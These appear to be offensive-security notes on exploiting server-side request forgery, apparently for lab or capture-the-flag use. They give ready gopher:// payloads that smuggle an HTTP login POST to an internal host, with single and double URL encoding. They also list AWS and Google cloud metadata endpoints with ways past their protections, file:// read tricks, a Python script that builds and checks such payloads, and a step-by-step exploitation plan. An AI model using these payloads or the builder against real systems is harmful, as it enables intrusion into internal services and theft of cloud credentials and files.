Tips:
- Remember to have Apache enabled first:
  sudo systemctl restart apache2
- Check your logs for connections:
  sudo tail /var/log/apache2/access.log
Gopher related:
- Have a shelf-prepared payload that needs the fewest possible changes: pick a username and password whose combined POST body length is fixed, so the Content-Length header never has to be recomputed between targets.
- Important note: if you are sending your SSRF payload through the web application itself (a form field in the browser), URL-encode it once; the browser encodes it a second time on submit. If you are sending it through Repeater, nothing does that second encoding for you, so encode it twice.
- Make sure the Content-Type field is correct (application/x-www-form-urlencoded for a normal login form), otherwise the backend will not parse the body.
- If you have a consistent payload, you only need to change the URI and the Host field.
- In POST requests there is a blank line between the headers and the POST data: strictly CRLF CRLF (%0d%0a%0d%0a); many servers also accept bare LF (%0a%0a).
- Gopher's default port is 70, so a gopher:// URL without a port goes to 70, not to the HTTP service. Always put the target service's port in the URL (gopher://host:80/...).
Just some general advice regarding SSRF:
- Possible places: any image or avatar field that accepts a URL, any search/add bar that accepts a URL.
Internal Cloud Metadata:
AWS: http://169.254.169.254/latest/meta-data/ (with IMDSv2 enforced, a GET-only SSRF fails: a token must first be obtained with a PUT to /latest/api/token and sent back in the X-aws-ec2-metadata-token header, which gopher can do since it lets you write the full request)
Google: http://metadata.google.internal/computeMetadata/v1/ (rejected unless the request carries the header Metadata-Flavor: Google, so a plain GET through the SSRF is not enough here either)
Different Protocols:
File (curl and Python's urllib will fetch file:// URLs; the Python requests library refuses them), both spellings are accepted by curl:
file:///tmp/foo.txt
file:/tmp/foo.txt
Gopher:
This builds a gopher URL that delivers a GET HTTP request to the service on the given port.
The extra _ after the port is a placeholder: the first character of a gopher selector is the item type and the client strips it before sending, so without it the first byte of your request (the G of GET) would be lost.
If you do this from Burp or curl, URL-encode every non-alphanumeric character once (a space becomes %20), then encode the whole URL a second time so the already-encoded characters survive the parameter decoding (%20 becomes %2520):
gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1
POST request (request line only; the Host header, Content-Length, blank line and body follow the same pattern as the full example):
gopher://127.0.0.1:80/_POST%20/status%20HTTP/1.1%0a
A normal POST request sent to the /login page with username and password, Content-Length and Content-Type, URL-encoded once (the form you paste into the application's own input field; 41 is the exact byte length of username=white.rabbit&password=dontbelate): gopher://backend:80/_POST%20/login%20HTTP/1.1%0d%0aHost:%20backend%0d%0aContent-Type:%20application%2fx-www-form-urlencoded%0d%0aContent-Length:%2041%0d%0a%0d%0ausername%3dwhite.rabbit%26password%3ddontbelate%0d%0a
The same URL encoded a second time, for sending directly from Repeater or curl: gopher%3A%2F%2Fbackend%3A80%2F_POST%2520%2Flogin%2520HTTP%2F1.1%250d%250aHost%3A%2520backend%250d%250aContent-Type%3A%2520application%252fx-www-form-urlencoded%250d%250aContent-Length%3A%252041%250d%250a%250d%250ausername%253dwhite.rabbit%2526password%253ddontbelate%250d%250a
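Building these by hand is where the mistakes happen (stale Content-Length, a missing _ placeholder, port 70 by accident, one encoding round too few or too many). The helper below is an added example, not part of the original notes: it assembles the raw HTTP request, derives Content-Length from the actual body bytes, wraps it in a gopher:// URL with the item-type placeholder and an explicit port, applies one or two rounds of URL encoding, and decodes a finished URL back to the exact bytes the gopher client will put on the wire so a payload can be checked before it is fired. The host backend and the credentials are the notes' own sample values, reused here as constructed input; the function names are this example's own.

```python
"""Added example: build and verify gopher:// SSRF payloads carrying a raw HTTP request.

Covers the points from the notes: the '_' item-type placeholder, an explicit
port (gopher defaults to 70), CRLF line endings with a blank line before the
body, a Content-Length computed from the real body bytes, and one vs. two
rounds of URL encoding. Host 'backend' and the credentials are constructed
sample values taken from the notes, not from any real target.
"""
from urllib.parse import quote, unquote, unquote_to_bytes, urlsplit


def build_http_request(method, path, host, body="",
                       content_type="application/x-www-form-urlencoded",
                       extra_headers=None):
    """Return the raw HTTP/1.1 request as bytes, ready to be wrapped in a gopher URL.

    Content-Length is always derived from the encoded body, so changing the
    credentials can never leave a stale length behind.
    """
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (extra_headers or {}).items():
        lines.append(f"{name}: {value}")
    body_bytes = body.encode("utf-8")
    if body_bytes:
        lines.append(f"Content-Type: {content_type}")
        lines.append(f"Content-Length: {len(body_bytes)}")
    # Headers end with CRLF; a blank line (CRLF CRLF) separates them from the body.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii") + body_bytes


def gopher_url(host, port, raw_request, encode_rounds=1):
    """Wrap raw request bytes in a gopher URL.

    encode_rounds=1 is the form you paste into the application's own input
    field (the browser encodes it once more on submit); encode_rounds=2 is
    what you paste into Burp Repeater or pass to curl, where nothing encodes
    it for you.
    """
    if not isinstance(port, int):
        raise TypeError("port must be explicit: gopher defaults to 70, not 80")
    # safe="" percent-encodes every byte that is not alphanumeric or in "_.-~",
    # so '/', ':', '=', '&', CR and LF all survive the parameter decoding.
    # The leading '_' is the gopher item type; the client strips it before
    # sending, so without it the first byte of the request would be eaten.
    url = f"gopher://{host}:{port}/_{quote(raw_request, safe='')}"
    for _ in range(encode_rounds - 1):
        url = quote(url, safe="")
    return url


def wire_bytes(url, encode_rounds=1):
    """Undo the encoding: return (host, port, bytes the gopher client will send).

    Use this to check a hand-built payload before firing it; it shows exactly
    what arrives at the internal service, including the blank line and
    whether Content-Length matches the body.
    """
    for _ in range(encode_rounds - 1):
        url = unquote(url)
    parts = urlsplit(url)
    selector = unquote_to_bytes(parts.path[1:])  # drop the leading '/'
    return parts.hostname, parts.port, selector[1:]  # drop the item-type character


if __name__ == "__main__":
    login = build_http_request("POST", "/login", "backend",
                               body="username=white.rabbit&password=dontbelate")
    print(gopher_url("backend", 80, login))                   # paste into the app's form
    print(gopher_url("backend", 80, login, encode_rounds=2))  # paste into Repeater / curl
    print(wire_bytes(gopher_url("backend", 80, login)))       # what the backend receives
```

wire_bytes is the check worth running on a payload copied from elsewhere: if the third element does not contain the blank line, or its Content-Length does not equal the length of what follows the blank line, the backend will hang waiting for more body or will cut it short.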
SSRF scenario example exploitation:
- Find a place where the SSRF happens.
- Attempt to fetch a file (a file:// URL) and see whether its contents come back to you.
- If they do not, look for a place in the application that renders the fetched content, other than the spot where you triggered it in step 2.
- If that still does not work, find another SSRF vulnerability.
- For example, if the image URL field is vulnerable to SSRF but the result never renders or downloads properly in that same function, try other places such as contact info to see whether the fetched content can be downloaded and rendered there.